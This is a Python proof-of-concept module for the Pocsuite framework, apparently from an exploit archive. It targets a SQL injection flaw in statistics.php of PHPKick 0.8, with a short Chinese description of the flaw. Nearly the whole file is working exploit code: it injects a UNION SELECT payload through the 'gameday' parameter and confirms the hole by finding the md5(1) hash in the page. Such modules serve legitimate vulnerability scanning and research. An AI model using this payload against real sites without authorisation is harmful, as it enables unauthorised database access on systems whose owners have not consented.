PHPKick 0.8 - statistics.php SQL Injection Exploit

                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '69551'
    version = '1'
    author = 'RickGray'
    vulDate = '2010-08-08'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = [
        'http://www.sebug.net/vuldb/ssvid-69551',
        'https://www.exploit-db.com/exploits/14578/'
    ]
    name = 'PHPKick 0.8 /statistics.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.phpkit.de'
    appName = 'PHPKick'
    appVersion = '0.8'
    vulType = 'SQL Injection'
    desc = '''
        PHPKick 0.8 /statistics.php 在处理日期浏览时获取
        $_GET['gameday'] 参数，将其拼接到 SQL 语句中，没有
        进行严格过滤，导致注入。
    '''

    samples = ['']

    def _verify(self):
        v_url = '/statistics.php'
        payload = '-32 union select 1,2,3,4,md5(1),6,7,8 --'
        params = {
            'action': 'overview',
            'gameday': payload
        }
        response = req.get(self.url + v_url, params=params)

        return self.parse_verify(response)

    def _attack(self):
        return self._verify()
    
    def parse_verify(self, response):
        output = Output(self)
        result = {}

        if response:
            if 'c4ca4238a0b923820dcc509a6f75849b' in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = response.url
                output.success(result)
            else:
                output.fail('Failed to match verify feature or not be vulnerable')
        else:
            output.fail('Internet Nothing Returend')

        return output


register(TestPOC)